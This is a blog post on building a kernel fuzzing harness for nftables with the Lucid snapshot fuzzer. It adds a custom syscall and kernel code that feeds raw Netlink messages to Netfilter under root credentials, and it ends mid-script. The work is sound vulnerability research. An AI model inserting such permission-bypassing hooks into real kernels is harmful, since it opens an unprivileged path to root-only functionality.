The Human Machine Interface

Lucid Dreams II: Harness Development

2025-10-13T00:00:00+00:00

Background

Last episode on the blog we took a shallow and broad approach to fuzzing several Netlink-plumbed subsystems like Netfilter, Route, Crypto, and Xfrm. This endeavor wasn’t necessarily an earnest bug finding mission since we mostly wanted to just see how fuzzing a real target with Lucid would go and what things would need tweaking. We ended up changing quite a bit of the core-fuzzer features, specifically Redqueen issues, and were able to improve the fuzzer quite a bit. We modularized the mutator component of Lucid so now writing your own fuzzer for Lucid is as simple as implementing your own mutator. We can extend this even more, and will, by enabling the user to pass command line arguments directly to the bespoke mutator.

So now you can conceive of the main Lucid core components as a fuzzing engine and the mutator as the “fuzzer” because it is responsible for all of the target-specific characteristics. So for example, if we were to fuzz Chrome in Lucid, you would write a “Chrome fuzzer” by implementing your own fuzzing harness for Chrome and then implementing your own mutator to generate and mutate inputs.

We now switch to a more earnest bug finding mode of operation. I’ve decided for this series to focus on fuzzing nftables for a few different reasons:

nftables doesn’t have as many eyeballs on it anymore, at least publicly, because kCTF has changed its rules around unprivileged user namespaces, which has severely decreased the value of exploitable bugs in surfaces that live behind those namespaces, so there is less competition
nftables is extremely complex. There are several hierarchical structures and states that can occur and, in addition, the code exists on two planes: a control plane responsible for creating these nested and complex resources and a data plane responsible for interacting with those created structures. For the early going, we’re going to focus exclusively on the control plane, with designs on implementing data plane interactions later
nftables has a history of bugs, so much so that it was explicitly disabled in kCTF’s bounty program
Syzkaller fuzzes nftables already, but if you look at the types of messages it is able to generate, it tends to favor syntactically-valid but semantically-invalid inputs. For instance, it will send a well-formed message to create a resource, but the argument values themselves may be nonsense. Further, syzkaller currently has no way to track the state of resources if they were successfully created. So sequences like create resource -> modify resource -> use resource -> destroy resource are not possible currently unless they happen by sheer random chance which is highly unlikely
Lastly, this represents a fun engineering challenge. Creating a mutator/generator that is able to achieve deep stateful coverage of nftables will, I think, be something unique as far as public research goes

Adding Custom Syscall

The first thing we need is a way to interact with the nftables subsystem. My go-to strategy here is to create a custom syscall that takes a userland buffer pointer and a data length. This allows us to send an input from userland and have it traverse the harness and then hit the target subsystem. Now, this is not how I want to fuzz, but it is a useful setup for debugging, collecting coverage metrics for visualization, and reproducing crashes. Ideally the flow looks like this:

Send data buffer via syscall
Context-switch to kernel mode as harness is about to parse input
[FUZZING-ONLY] Take snapshot
Harness parses input and dispatches to target subsystem
[FUZZING-ONLY] Reset snapshot
Return to userland

This setup gives us the best of both worlds: we can easily debug and play with our harness from userland, and we can also fuzz completely in kernel context without having to emulate any expensive context switches per fuzzcase.

To add a new syscall, we have to edit the syscall_64.tbl file found in linux_version/arch/x86/entry/syscalls, wherein I added a new syscall entry right after the last syscall entry:

...
466	common	removexattrat		sys_removexattrat
467	common	open_tree_attr		sys_open_tree_attr
468	common	file_getattr		sys_file_getattr
469	common	file_setattr		sys_file_setattr
470	common	lucid_fuzz		sys_lucid_fuzz

Now we have to define it in the linux_version/include/linux/syscalls.h file:

...
asmlinkage long sys_geteuid16(void);
asmlinkage long sys_getgid16(void);
asmlinkage long sys_getegid16(void);
asmlinkage long sys_lucid_fuzz(const void __user *data, size_t len);

Because we want to fuzz nftables, I decided to implement the syscall itself in a new file called lucid_fuzz.c and placed that inside linux_version/net/netfilter folder:

#include <linux/kernel.h>
#include <linux/printk.h>
#include <linux/syscalls.h>

SYSCALL_DEFINE2(lucid_fuzz, const void __user *, data, size_t, len)
{
    printk("Inside lucid fuzz!\n");
    return 0;
}

Now we have to tell the kernel to compile this source file. This is accomplished by editing the folder’s Makefile to ensure that our lucid_fuzz.c file is used to create an object file. I changed the top line of the Makefile in my kernel version 6.17 to this:

netfilter-objs := core.o nf_log.o nf_queue.o nf_sockopt.o utils.o lucid_fuzz.o

When we build the kernel, we should see this in the output

  CC      net/netfilter/lucid_fuzz.o

To interact with the syscall, we’ll need a userland program. This is a small program to read data from standard in (easy to use in the future to reproduce crashes or replay fuzzing inputs) and then send that data via the syscall to the kernel:

// gcc harness.c -o harness -static
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __NR_lucid_fuzz
#define __NR_lucid_fuzz 470 // Our syscall number
#endif

int main(void) {
    // Start at a page, we'll double this if we need more memory
    size_t cap = 4096;
    size_t len = 0;
    const size_t MAX_CAP = 64 * 1024 * 1024; // Shouldn't need more than this?

    // Create a buffer to hold data
    uint8_t *buf = malloc(cap);
    if (!buf) {
        perror("malloc");
        return 1;
    }

    // Read until we can't
    while (1) {
        // Grab data from standard in, taking into account the offset as determined
        // by `len`
        ssize_t n = read(STDIN_FILENO, buf + len, cap - len);

        // If we got bytes...
        if (n > 0) {
            // Adjust offset
            len += (size_t)n;

            // See if we hit the current cap
            if (len == cap) {

                // Hit sanity check, bail
                if (cap >= MAX_CAP) {
                    fprintf(stderr, "refusing to grow beyond %zu bytes\n", MAX_CAP);
                    free(buf);
                    return 1;
                }

                // Create new backing buffer
                size_t ncap = cap * 2;

                // Lol 
                if (ncap <= cap) {
                    fprintf(stderr, "size overflow\n");
                    free(buf);
                    return 1;
                }

                // Make sure we didn't do an oopsie
                if (ncap > MAX_CAP) ncap = MAX_CAP;
                uint8_t *tmp = realloc(buf, ncap);
                if (!tmp) {
                    perror("realloc");
                    free(buf);
                    return 1;
                }

                // Update 
                buf = tmp;
                cap = ncap;
            }
            continue;
        }

        // Done reading: EOF
        if (n == 0) break;

        // Failed to read but just because of an interrupt, try again
        if (n < 0 && errno == EINTR) continue;
        
        // Bail on any other errors
        if (n < 0) {
            perror("read");
            free(buf);
            return 1;
        }
    }

    // Call our custom syscall 
    long ret = syscall(__NR_lucid_fuzz, buf, (size_t)len);

    // Need to make sure that our syscall returns meaningful data on error
    if (ret == -1) {
        int e = errno;
        fprintf(stderr, "lucid_fuzz failed: %s\n", strerror(e));
        free(buf);
        return 1;
    }

    printf("lucid_fuzz returned %ld\n", ret);
    free(buf);
    return 0;
}

Now we can test in qemu-system:

root@syzkaller:~# echo "lol" | harness
[  256.492957] Inside lucid fuzz!
lucid_fuzz returned 0
root@syzkaller:~# 

So everything works with the syscall, now it’s time to make it an actual fuzzing harness.

Deciding Input Format

We want to be able to create stateful inputs for nftables. This obviously means we need enough runway initially in our inputs to build up complex state! This seems obvious and simple, but I think it’s hard to actually implement correctly. We have to consider various things like:

Not all “state” is “good state”: Just because an input can create 4096 nft_table data structures, doesn’t mean that that’s interesting from a vulnerability research perspective
Short inputs are not likely going to create complex state: We need to have somewhat long inputs in order to build up state
Extremely large inputs may be meaningless: There may not be any meaningful difference between short and long inputs when the short input is long enough to create “good state” and we may end up spending tons of CPU cycles doing nothing interesting and working on enormous inputs

With these things in mind, let’s first take a cautious approach and make sure we can generate long inputs some of the time, but most of the time focus on relatively normal sized inputs.

`nftables` Messages

nftables expects Netlink messages that are formatted a certain way. It has two modes of messaging as far as I can tell: standalone messages, which are simple messages like “object getters” and batched messages, which are for object creation/modification/deletion. They have gone with a design where anything that can modify state is subject to batching and everything that is read-only can be a standalone message. In the batch mode of operation, nftables will have something like a “staging” phase, where it parses the messages in the batch and validates them. While it’s validating each individual batched message, it makes sure that the resources being created/manipulated are sane and actually exist and are modifiable. nftables will stage all the changes and then if a single message fails in the batch, will attempt to roll back all of those staged changes. If batch message parsing succeeds however, it moves into a “commit” phase and makes the changes.

So basically, our input generator will need to be capable of sending batches of nftables requests with some simple read-only requests sprinkled in rarely. I decided to follow a high level input shape that is very similar to our last blogpost for this purpose. We will do the following:

Have Lucid inject a buffer of bytes at a location in Bochs’ memory. This is standard and how you want to separate duties between Lucid the fuzzing engine and Lucid’s mutators/generators. Let Lucid the fuzzing engine inject a byte blob, let the harness/mutator/generator make sense of the blob.
We will pre-allocate socket buffer structures skb(s) in the kernel so that we don’t do any large allocations in the fuzzing loop
The harness will parse the byte blob, and package each input series from the mutator in an skb and ship the skb off to nftables for parsing
We will separate series of nftables messages into what we’ll call “envelopes”. Last blogpost we called them “messages” but because Netlink also operates on “messages” this nomenclature is confusing.

Our input then will contain two different data structures as the harness sees things:

// An input structure
struct lf_input {
	u32 total_len;
	u32 num_envs;
	u8 data[];
};

// An envelope structure
struct lf_envelope {
	u32 len;
	u8 data[];
};

This is very similar to our last blogpost, but with some key changes to the envelope structure. So in practice, an input will always have a single struct lf_input structure at its beginning describing the input in its entirety, and then, up to the max number of envelopes, a series of struct lf_envelope structures containing the actual Netlink messages for nftables in its data member. So an input may look like:

[
	[lf_input: total_len=4112, num_envs=2]
		[lf_envelope: len=2048, data=[2048 bytes]]
		[lf_envelope: len=2048, data=[2048 bytes]]
]
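To make the size accounting concrete, here is a minimal Python sketch of that layout. It assumes little-endian u32 fields (as on the x86-64 guest), and pack_lf_input is a hypothetical helper name used only for illustration. By the harness's accounting, total_len covers the 8-byte input header plus every envelope's 4-byte header and payload:

```python
import struct

LF_INPUT_HDR_SIZE = 8  # total_len + num_envs, two u32 fields
LF_ENV_HDR_SIZE = 4    # len, one u32 field


def pack_lf_input(envelopes):
    """Serialize a list of envelope payloads (bytes) into one input blob.

    Hypothetical helper: field order follows struct lf_input and
    struct lf_envelope, little-endian is an assumption about the guest.
    """
    body = b"".join(struct.pack("<I", len(e)) + e for e in envelopes)
    total_len = LF_INPUT_HDR_SIZE + len(body)
    return struct.pack("<II", total_len, len(envelopes)) + body


# Two envelopes with 2048-byte payloads each
blob = pack_lf_input([b"A" * 2048, b"B" * 2048])
total_len, num_envs = struct.unpack_from("<II", blob, 0)
print(total_len, num_envs, len(blob))
```

With two 2048-byte payloads, the blob is 8 + 2 * (4 + 2048) = 4112 bytes long, and total_len must equal that value for the harness to accept it.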

Remember: the core Lucid components know nothing about this structure, Lucid is only responsible for injecting the input and its length into the target at a location in memory. It’s up to the mutator and the harness to make sense of the structure.

So now let’s implement the harness with this in mind. It will need to receive the bytes, parse them, wrap each envelope’s data in an skb and send the skb to nftables.

Reaching `nftables`

The normal path user input takes to nftables is something like:

userland process creates a NETLINK_NETFILTER Netlink socket
userland process sends request via sendmsg syscall or similar (maybe sendto) via the Netlink socket
those bytes get wrapped in an skb in netlink_sendmsg
based on the socket’s protocol type, netlink_sendmsg will find Netfilter’s registered kernel socket that was initialized at kernel boot. That socket has a callback attached to it called .input that is invoked when there is data ready for it
The callback, which points to nfnetlink_rcv, is invoked and receives the skb holding our data from userland

We can do similar things, but make it more direct since we know the destination in our harness is nftables. We can:

Pre-allocate skb structures to hold our envelopes
Parse the lf_input and, for each included lf_envelope:
Stuff the envelope’s data into an skb
Send the skb directly to nfnetlink_rcv
Repeat from step 3 until no envelopes remain

Harness Init Code

Let’s go ahead and fill out the logic for the initialization routine of our custom syscall. This code is invoked once before we start fuzzing and does not run in the fuzzing loop; it is meant to set up everything we need for the harness to work appropriately. This is where we will set up the skbs, and to do so we’ll need to define some constants that describe maximum input shapes. The first constant we need to set is MAX_NUM_ENVELOPES (LF_MAX_NUM_ENVS in the code), which tells us how many struct lf_envelope structures can exist in a struct lf_input. We’ll also need to know MAX_ENVELOPE_LEN (LF_MAX_ENV_LEN), which describes how big an envelope’s data payload can be. Finally, as a byproduct of both the maximum number of envelope structures and their maximum length, we’ll deduce MAX_INPUT_LEN (LF_MAX_INPUT_LEN), which is the largest possible value for lf_input->total_len.

For now, let’s go ahead and say that we can have up to 24 envelopes, and each one can be up to 8192 bytes. In the mutator, we’ll define min/max thresholds where we mostly uniformly distribute size selection between those two thresholds, with a small possibility of going lower or higher than them. So most of the time we’ll send at least 8 and at most 16 envelopes, something like that, and we’ll make 1-7 and 17-24 very rare. Same with the sizes: we’ll try not to send an insane amount of nftables messages per envelope and approach the 8k max. But this is for a later blogpost on the mutator.
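As a rough illustration of that selection policy (the real mutator is Rust and is left for a later post), here is a Python sketch. The 5% rare-case probability and the name pick_num_envelopes are assumptions made up for this example; only the 1-24 range and the 8-16 common band come from the text above:

```python
import random

MAX_ENVS = 24                   # hard cap from the harness
COMMON_MIN, COMMON_MAX = 8, 16  # band we want to hit most of the time
RARE_PROB = 0.05                # assumed value, not taken from the mutator


def pick_num_envelopes(rng):
    """Pick an envelope count: usually uniform in 8..16, rarely outside it."""
    if rng.random() >= RARE_PROB:
        return rng.randint(COMMON_MIN, COMMON_MAX)
    # Rare path: choose uniformly among 1..7 and 17..24
    rare = list(range(1, COMMON_MIN)) + list(range(COMMON_MAX + 1, MAX_ENVS + 1))
    return rng.choice(rare)


rng = random.Random(1234)
samples = [pick_num_envelopes(rng) for _ in range(10000)]
common = sum(COMMON_MIN <= s <= COMMON_MAX for s in samples)
print(f"{common / len(samples):.1%} of samples fell in the common band")
```

The same two-tier idea would apply to envelope payload sizes, with the rare tier allowed to approach the 8192-byte cap.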

With the constants in mind we can build. We can do all of this in af_netlink.c in /net/netlink because it has all of the things we need access to and makes everything easy. So we’ll implement lucid_fuzz_init in there, which means we need access to lucid_fuzz_init in our standalone lucid_fuzz.c source file, so we’ll change that to:

#include <linux/kernel.h>
#include <linux/printk.h>
#include <linux/syscalls.h>

// Declared in /include/net/lucid_fuzz.h
extern int lucid_fuzz_init(const void __user *data, size_t len);

SYSCALL_DEFINE2(lucid_fuzz, const void __user *, data, size_t, len)
{
    int ret = 0;

    printk("Inside lucid fuzz!\n");
    printk("Calling lucid_fuzz_init...\n");
    ret = lucid_fuzz_init(data, len);
    if (ret)
        goto done;

done:
	return ret;
}

Now we’ll need to create that header file in /include/net/lucid_fuzz.h:

/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _NET_LUCID_FUZZ_H
#define _NET_LUCID_FUZZ_H

int lucid_fuzz_init(const void __user *data, size_t len);

#endif /* _NET_LUCID_FUZZ_H */

Now we can include that header in af_netlink.c. And we get started in that source file with our defines of our constants we discussed:

/*************** Start of Lucid Fuzzing Harness *****************************/
#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input->total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope->len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)
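The arithmetic behind those macros is easy to check by hand. This short Python sketch mirrors the defines, assuming sizeof(u32) is 4:

```python
U32 = 4  # sizeof(u32)

LF_MAX_NUM_ENVS = 24
LF_MAX_ENV_LEN = 8192
LF_INPUT_HDR_SIZE = U32 * 2  # total_len + num_envs
LF_ENV_HDR_SIZE = U32        # len

# Every envelope costs its payload plus a 4-byte header
LF_MAX_TOTAL_ENV = (LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS
LF_MAX_INPUT_LEN = LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE

print(LF_MAX_TOTAL_ENV, LF_MAX_INPUT_LEN)  # 196704 196712
```

So the largest input is 196712 bytes, which is the value the harness prints for LF_MAX_INPUT_LEN in the kernel log during testing.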

Next, I defined the LUCID_SIGNATURE that Lucid scans for when trying to decide where to inject inputs. It knows the layout of the struct lf_fuzzcase so it knows that directly after the signature portion it has a length field and then the variable length data field where it inserts the raw bytes:

// Structure that describes an input as Lucid sees it
struct lf_fuzzcase {
	unsigned char signature[16];
	size_t input_len;
	u8 input[LF_MAX_INPUT_LEN];
};

// Create instance of the struct
struct lf_fuzzcase fc = {
	.signature = LUCID_SIGNATURE,
	.input_len = 0,
	.input = { 0 }	/* Where Lucid injects an input */
};

Then we define some globals that we need to initialize:

handler: This is a function pointer basically to the nfnetlink_rcv function that we look up by protocol in the init namespace
kern_sock: This is the struct sock that is registered during kernel boot for the Netfilter subsystem to receive data from userland (and I guess kernel threads?)
skbs: Just a flat buffer of the skb structures we’ll need to use to wrap our envelope data, the harness exchanges envelopes by skb structures

Finally the initialization routine is thus:

// The function pointer we send the skbs to, the netlink rcv handler for
// netfilter nfnetlink_rcv
void *handler = NULL;

// The kernel-registered socket waiting for input from us
struct sock *kern_sock = NULL;

// Pool of skbs we use to store data in envelopes
struct sk_buff *skbs[LF_MAX_NUM_ENVS] = { 0 }; 

// Our initialization function, called before we do any fuzzing
int lucid_fuzz_init(const void __user *data, size_t len) {
	int err = 0;
	int i = 0;
	struct sk_buff *skb = NULL;

	printk("Hello from lucid_fuzz_init\n");
	printk("LF_MAX_INPUT_LEN is: %lu\n", LF_MAX_INPUT_LEN);

	// Copy the user data over to the fuzzcase instance if there is any
	if (len > 0 && len <= LF_MAX_INPUT_LEN) {
		if (copy_from_user(
			fc.input, data, len
		))
		{
			err = -EFAULT;
			goto done;
		}
		fc.input_len = len;
	}

	// Doing this how other kernel code does it, lock the global table
	netlink_table_grab();

	// Pre-set the err as if we failed to find the handler for NETFILTER
	err = -ENOENT;

	// Check to see if the handler is registered
	if (!nl_table[NETLINK_NETFILTER].registered) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab the kernel socket
	kern_sock = netlink_lookup(&init_net, NETLINK_NETFILTER, 0);
	if (!kern_sock) {
		netlink_table_ungrab();
		goto done;
	}

	// Grab that .input handler
	handler = nlk_sk(kern_sock)->netlink_rcv;
	if (!handler) {
		netlink_table_ungrab();
		goto done;
	}

	// Ungrab the table we're done with it
	netlink_table_ungrab();

	// Pre-set
	err = -ENOMEM;

	// Create all of the socket buffers we need and store them
	for (i = 0; i < LF_MAX_NUM_ENVS; i++) {
		skb = alloc_skb(LF_MAX_ENV_LEN, GFP_KERNEL);
		// If we failed, unroll all the previous allocations
		if (!skb) {
			while (--i >= 0) {
				kfree_skb(skbs[i]);
				skbs[i] = NULL;
			}
			goto done;
		}

		// Initialize what we need to look legit
		skb->pkt_type = PACKET_HOST;
		skb->sk = kern_sock;
		NETLINK_CB(skb).portid = 0x1337;
		NETLINK_CB(skb).dst_group = 0;
		NETLINK_CB(skb).creds.uid = GLOBAL_ROOT_UID;
		NETLINK_CB(skb).creds.gid = GLOBAL_ROOT_GID;
		NETLINK_CB(skb).flags = NETLINK_SKB_DST;

		// Store the skb
		skbs[i] = skb;
	}

	// We are so done dude, it worked
	err = 0;

done:
	return err;
}

This should initialize all of the structures we need to start actually parsing inputs and dispatching them in the main harness function.

Main Parsing Routine

We’ve reached the point now where the input buffer global is loaded with data and we know the address of the function to invoke to dispatch the data to Netfilter. We’ve also initialized the socket buffers we’re going to use to do the transportation. We need to describe what an input looks like, so let’s define our input structures.

// Define our input structures
struct lf_input {
	u32 total_len;
	u32 num_envs;
	u8 data[];
};

struct lf_envelope {
	u32 len;
	u8 data[];
};

The first thing we do in the main loop is take the snapshot that Bochs will save to disk. The Lucid workflow is something like:

develop environment, harness
put a special NOP operation in the harness where you want to snapshot fuzz from (xchg dx, dx)
run the environment/harness in gui-bochs. This is a relatively normal Bochs binary built with GUI support that is supposed to be user-friendly and allows you to dump this Bochs snapshot to disk
the Rust fuzzer binary, lucid-fuzz can then take that Bochs snapshot on disk, and resume its execution with a purpose-built lucid-bochs binary. This will call into the Lucid fuzzer before it emulates the first instruction and create a new kind of snapshot that Lucid can understand and restore every fuzzing iteration.

Below is the code I’ve added to Bochs to save the Bochs snapshot to disk when we encounter the xchg dx, dx NOP, where i is a variable name for the instruction structure:

#if BX_SNAPSHOT
  // Check for take snapshot instruction `xchg dx, dx`
  if ((i->src() == i->dst()) && (i->src() == 2)) {
    BX_COMMIT_INSTRUCTION(i);
    if (BX_CPU_THIS_PTR async_event)
      return;
    ++i;
    char save_dir[] = "/tmp/lucid_snapshot";
    mkdir(save_dir, 0777);
    printf("Saving Lucid snapshot to '%s'...\n", save_dir);
    if (SIM->save_state(save_dir)) {
      printf("Successfully saved snapshot\n");
      sleep(2);
      exit(0);
    }
    else {
      printf("Failed to save snapshot\n");
    }
    BX_EXECUTE_INSTRUCTION(i);
  }
#endif

Then we get around to making sure we have enough bytes to form the metadata structure (lf_input) and sanity check its values before moving on to the nested envelopes. You’ll notice that all error paths are return 1;. This is so that during fuzzing and mutator development, a malformed input skips over the snapshot-restore NOP instruction at the end of the main fuzzing loop in the harness, so the fuzzcase never ends cleanly and times out instead. This cascade of timeouts will let us know that we have a bug in our mutator. Here is the main loop:

// Main input processing logic
int lucid_fuzz_handle_input(void) {
	struct lf_input *input = NULL;
	struct lf_envelope *env = NULL;
	struct sk_buff *fuzz_skb = NULL;
	u32 remaining = 0;
	u32 offset = 0;
	u32 i = 0;

	printk("Hello from lucid_fuzz_handle_input\n");

	/** LUCID TAKES SNAPSHOT HERE **/
	// This special NOP instruction, when interpreted by Bochs will cause
	// Bochs to save a snapshot of its state to disk that Lucid will be able
	// to resume in its purpose-built version of Bochs called `lucid-bochs`
	asm volatile("xchgw %dx, %dx");

	// Make sure we have enough bytes to construct the input metadata
	if (fc.input_len < sizeof(struct lf_input))
		return 1;

	// Cast the data to our metadata struct
	input = (struct lf_input *)fc.input;

	// Sanity check the values
	if (input->total_len != fc.input_len || input->total_len > LF_MAX_INPUT_LEN)
		return 1;

	// Sanity check the number of envelopes
	if (input->num_envs > LF_MAX_NUM_ENVS || input->num_envs == 0)
		return 1;

	// Check how many remaining bytes we have, and subtract what we already
	// consumed with the input metadata
	remaining = input->total_len;
	remaining -= LF_INPUT_HDR_SIZE;

	// Start tracking an offset into the byte buffer where we're reading from
	offset = LF_INPUT_HDR_SIZE;

Then we can start iterating through envelopes and parsing them. Each successfully parsed envelope gets turned into an skb and dispatched to nftables:

// Iterate through the envelopes and parse each one
	for (i = 0; i < input->num_envs; i++) {
		// Make sure we have enough data remaining to parse an envelope metadata
		if (remaining < LF_ENV_HDR_SIZE)
			return 1;

		// We can at least read the length field, and sanity check it
		env = (struct lf_envelope *)(fc.input + offset);
		if (env->len > LF_MAX_ENV_LEN || env->len == 0)
			return 1;

		// Consume those bytes
		remaining -= LF_ENV_HDR_SIZE;

		// Make sure we can read that much data
		if (remaining < env->len)
			return 1;

		// We have enough data left, create the skb for this envelope
		fuzz_skb = create_fuzz_skb(env, i);
		if (!fuzz_skb)
			return 1;

		// Dispatch the fuzz_skb to nftables!
		dispatch_skb(fuzz_skb);

		// Update our offset
		offset += (LF_ENV_HDR_SIZE + env->len);

		// Update remaining
		remaining -= env->len;

	}

We initialize the fuzz_skb in this function. This is where we set the socket buffer up with all the information we need to successfully get received and parsed by nftables. We exchange the “envelope” wrapper for the socket buffer wrapper instead:

// Creates a socket buffer filled with fuzz message
static struct sk_buff *create_fuzz_skb(struct lf_envelope *env, int idx) {
	struct sk_buff *skb = NULL;

	// Sanity check
	if (idx >= LF_MAX_NUM_ENVS)
		return NULL;

	// Grab socket buffer from global buf
	skb = skbs[idx];

	// Set the socket buffer's sock to the kernel sock for Netfilter
	skb->sk = kern_sock;

	// Inject fuzz data and set sizes
	memcpy(skb_put(skb, env->len), env->data, env->len);

	return skb;
}

The dispatching of the skb is simple, we just cast the handler to the right function pointer signature and then invoke it with the skb:

// Dispatches the skb to the appropriate netlink recv handler
static void dispatch_skb(struct sk_buff *skb) {
	// Create function pointer; handler was resolved in lucid_fuzz_init
	void (*rcv)(struct sk_buff *) = handler;

	// Dispatch!
	rcv(skb);
}

The main fuzzing loop then of course restores the snapshot after we’re done parsing envelopes:

// Done parsing envelopes, check if we have remaining bytes
	if (remaining)
		return 1;

	/** LUCID RESTORES SNAPSHOT **/
	asm volatile("xchgw %bx, %bx");

	// Finally done
	return 0;

We’ll save the rest of the snippets for the source files I’ll post at the end.
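Since any rejected input shows up as a timeout while fuzzing, it can be handy to pre-check inputs in userland before replaying them. The Python sketch below mirrors the harness checks under the assumption of little-endian u32 fields; split_envelopes is a hypothetical name. One difference to keep in mind: the kernel harness dispatches each envelope as soon as it parses it, while this mirror only accepts or rejects the input as a whole.

```python
import struct

LF_MAX_NUM_ENVS = 24
LF_MAX_ENV_LEN = 8192
LF_INPUT_HDR_SIZE = 8
LF_ENV_HDR_SIZE = 4
LF_MAX_INPUT_LEN = (LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS + LF_INPUT_HDR_SIZE


def split_envelopes(blob):
    """Return the envelope payloads, or None where the harness would return 1."""
    if len(blob) < LF_INPUT_HDR_SIZE:
        return None
    total_len, num_envs = struct.unpack_from("<II", blob, 0)
    if total_len != len(blob) or total_len > LF_MAX_INPUT_LEN:
        return None
    if num_envs == 0 or num_envs > LF_MAX_NUM_ENVS:
        return None

    offset = LF_INPUT_HDR_SIZE
    remaining = total_len - LF_INPUT_HDR_SIZE
    payloads = []
    for _ in range(num_envs):
        # Need at least an envelope header
        if remaining < LF_ENV_HDR_SIZE:
            return None
        (env_len,) = struct.unpack_from("<I", blob, offset)
        if env_len == 0 or env_len > LF_MAX_ENV_LEN:
            return None
        remaining -= LF_ENV_HDR_SIZE
        # Need the full payload
        if remaining < env_len:
            return None
        start = offset + LF_ENV_HDR_SIZE
        payloads.append(blob[start:start + env_len])
        offset = start + env_len
        remaining -= env_len

    # Trailing bytes are an error, same as in the harness
    return None if remaining else payloads


good = struct.pack("<III", 15, 1, 3) + b"abc"
trailing = struct.pack("<III", 16, 1, 3) + b"abcX"
print(split_envelopes(good), split_envelopes(trailing))
```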

Testing Harness

Everything is wired up, so now we can send inputs via the harness userland binary we compiled. Let’s check out strace on the nft userland utility and see where the Netlink message to create an nft_table is sent over the Netlink socket. Our nft command is: nft add table inet fuzz:

// Create the Netlink socket of the protocol type NETLINK_NETFILTER
socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER) = 3

// nft first queries the ruleset generation (NFT_MSG_GETGEN) over that socket fd we just created
sendto(3, [{nlmsg_len=20, nlmsg_type=NFNL_SUBSYS_NFTABLES<<8|NFT_MSG_GETGEN, nlmsg_flags=NLM_F_REQUEST, nlmsg_seq=0, nlmsg_pid=0}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(0)}], 20, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, 12) = 20
recvmsg(3, {msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, msg_namelen=12, msg_iov=[{iov_base=[{nlmsg_len=44, nlmsg_type=NFNL_SUBSYS_NFTABLES<<8|NFT_MSG_NEWGEN, nlmsg_flags=0, nlmsg_seq=0, nlmsg_pid=125392}, {nfgen_family=AF_UNSPEC, version=NFNETLINK_V0, res_id=htons(103)}, [[{nla_len=8, nla_type=0x1}, "\x00\x00\x00\x67"], [{nla_len=8, nla_type=0x2}, "\x00\x01\xe9\xd0"], [{nla_len=8, nla_type=0x3}, "\x6e\x66\x74\x00"]]], iov_len=69631}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = 44

That sendto is only the generation query; the table creation itself goes out in a later sendmsg syscall. So what I did was write an LD_PRELOAD shared object to hexdump the iovec data sent over sendmsg. Now I can get hexdump -C style output for the nft message:

LD_PRELOAD=$PWD/hexdump_netlink.so nft add table inet fuzz
00000000  14 00 00 00 10 00 01 00  00 00 00 00 00 00 00 00 |................|
00000010  00 00 0a 00 28 00 00 00  00 0a 01 00 01 00 00 00 |....(...........|
00000020  00 00 00 00 01 00 00 00  09 00 01 00 66 75 7a 7a |............fuzz|
00000030  00 00 00 00 08 00 02 00  00 00 00 00 14 00 00 00 |................|
00000040  11 00 01 00 02 00 00 00  00 00 00 00 00 00 0a 00 |................|
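To see how those 80 bytes map onto the batch structure described earlier, here is a small Python sketch that walks the dump. It assumes the standard 16-byte nlmsghdr layout (u32 len, u16 type, u16 flags, u32 seq, u32 pid) in little-endian host order and 4-byte alignment for messages and attributes; walk_messages and walk_attrs are hypothetical helper names, not part of any library:

```python
import struct

DUMP = bytes.fromhex(
    "14 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 "
    "00 00 0a 00 28 00 00 00 00 0a 01 00 01 00 00 00 "
    "00 00 00 00 01 00 00 00 09 00 01 00 66 75 7a 7a "
    "00 00 00 00 08 00 02 00 00 00 00 00 14 00 00 00 "
    "11 00 01 00 02 00 00 00 00 00 00 00 00 00 0a 00"
)

NLMSG_HDRLEN = 16


def walk_messages(buf):
    """Yield (type, flags, seq, payload) for each Netlink message in buf."""
    off = 0
    while off + NLMSG_HDRLEN <= len(buf):
        length, mtype, flags, seq, _pid = struct.unpack_from("<IHHII", buf, off)
        if length < NLMSG_HDRLEN or off + length > len(buf):
            raise ValueError("truncated or malformed message")
        yield mtype, flags, seq, buf[off + NLMSG_HDRLEN:off + length]
        off += (length + 3) & ~3  # messages are 4-byte aligned


def walk_attrs(buf):
    """Yield (type, value) for each Netlink attribute in buf."""
    off = 0
    while off + 4 <= len(buf):
        nla_len, nla_type = struct.unpack_from("<HH", buf, off)
        if nla_len < 4 or off + nla_len > len(buf):
            raise ValueError("malformed attribute")
        yield nla_type, buf[off + 4:off + nla_len]
        off += (nla_len + 3) & ~3  # attributes are padded to 4 bytes


for mtype, flags, seq, payload in walk_messages(DUMP):
    # The first 4 payload bytes are the nfgenmsg header, attributes follow
    attrs = list(walk_attrs(payload[4:]))
    print(f"type={mtype:#06x} flags={flags:#x} seq={seq} attrs={attrs}")
```

The walk yields three messages: a batch begin (type 0x10), the table creation in the nftables subsystem (type 0x0a00, that is NFNL_SUBSYS_NFTABLES<<8|NFT_MSG_NEWTABLE) carrying the name attribute "fuzz" and a zeroed flags attribute, and a batch end (type 0x11).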

Now we know what a legit nftables message looks like and we can wrap it in our lf_input and lf_envelope structures and test the harness! I took that output and just hardcoded it into a janky Python script to dump the binary to the terminal:

import struct
import sys

# Dumped message
msg_str = [
